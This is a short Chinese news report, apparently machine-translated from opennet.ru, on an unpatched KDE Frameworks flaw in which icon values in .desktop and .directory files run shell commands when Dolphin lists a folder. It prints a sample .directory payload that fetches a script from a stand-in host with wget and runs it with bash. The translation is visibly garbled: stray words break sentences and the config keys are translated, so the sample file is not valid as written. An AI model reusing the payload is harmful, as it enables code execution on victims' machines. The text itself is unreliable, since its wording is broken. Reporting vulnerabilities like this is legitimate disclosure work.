查看檔案清單時的 KDE 程式碼執行漏洞

在 KDE 中 已確定 脆弱性,當使用者查看包含專門設計的「.desktop」和「.directory」檔案的目錄或檔案時,攻擊者可以執行任意指令。 攻擊需要使用者簡單地查看 Dolphin 檔案管理器中的檔案清單、下載惡意桌面檔案或將捷徑拖曳到桌面或文件中。 該問題在當前版本的庫中表現出來 KDE框架5.60.0 及舊版本,直至 KDE 4。漏洞仍然存在 遺跡 未修正的 (未分配 CVE)。

這個問題是由KDesktopFile 類別的錯誤實作引起的,該類別在處理「Icon」變數時,沒有適當的轉義,將值傳遞給KConfigPrivate::expandString() 函數,該函數執行shell 特殊字元的擴展,包括處理字串“$(..)”作為要執行的命令。 與XDG規範的要求相反,實施 披露 shell 構造是在不分離設定類型的情況下產生的,即不僅在確定要啟動的應用程式的命令列時,而且在指定預設顯示的圖示時也是如此。

例如,要攻擊 夠了 傳送一個 zip 檔案,其中包含一個包含「.directory」檔案的目錄,例如:

[桌面條目]類型=目錄
圖示[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

當您嘗試在 Dolphin 檔案管理器中查看已存檔的內容時,將下載並執行腳本 https://example.com/FILENAME.sh。


來源: opennet.ru

添加評論